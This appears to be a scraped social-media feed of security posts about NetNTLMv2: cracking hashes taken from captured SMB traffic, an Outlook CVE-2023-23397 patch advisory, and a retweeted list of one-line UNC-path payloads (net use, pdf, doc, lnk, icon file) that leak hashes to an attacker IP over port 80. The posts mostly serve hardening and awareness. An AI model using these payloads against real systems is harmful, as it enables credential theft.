Lmst

One example why to use strong #passwords for users who use file sharing over #SMB even when the file transfers are #encrypted.
If the SMB traffic is captured/eavesdropped, then the attacker can try to crack the user password.
The attacker is able to extract challenge/response values from the Session Setup and then use #passwordcracking tools such as #hashcat

If the attack is successful, the attacker will gain not only the access to the user account, but it is also possible to decrypt the captured SMB file transfers. There is lack of perfect forward secrecy in this encryption.

For more details and practical examples, see this blog post:

https://malwarelab.eu/posts/tryhackme-smb-decryption/

#networktrafficanalysis #networktraffic #encryption #netntlmv2 #netntlm #ntlm #windows #fileshare #pentesting #cybersecurity #hardening #password #cracking #offensivesecurity #offsec #blueteam #purpleteam

extraction of challenge/response parameters from the pcap with tshark

cracking password with hashcat, example of dictionary attack against NetNTLMv2

NT Password in Wireshark NTLMSSP protocol preferences

🚨#CVE-2023-23397 is a new vulnerability in Microsoft #Outlook leading to an Elevation of Privilege through collecting #NetNTLMv2 hashes. Crafted Exchange messaging items (Mail, Calendar, Tasks) may contain a UNC path in the PidLidReminderFileParameter property.
Patch now!

Microsoft released a #Powershell script to check onPrem and Cloud Exchange instances for malicious message items: https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-23397

According to @BleepinComputer
MSFT identified #APT28 exploiting this vuln before: https://bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-zero-day-used-by-russian-hackers-since-april-2022/

For more details on the exploit check out the write-up by MDSec below ⬇️
https://twitter.com/MDSecLabs/status/1635791863478091778

#infosec #cybersecurity #blueteam

RT @mynameisv__@twitter.com

Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\t
or pdf : /F (\\\\IP@80\\t)
or dubdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
or: IconFile=\\IP@80\t.ico

#RedTeam #NTLM cc @ddouhine@twitter.com

🐦🔗: https://twitter.com/mynameisv__/status/1123256857072742400

#netntlmv2

Client Info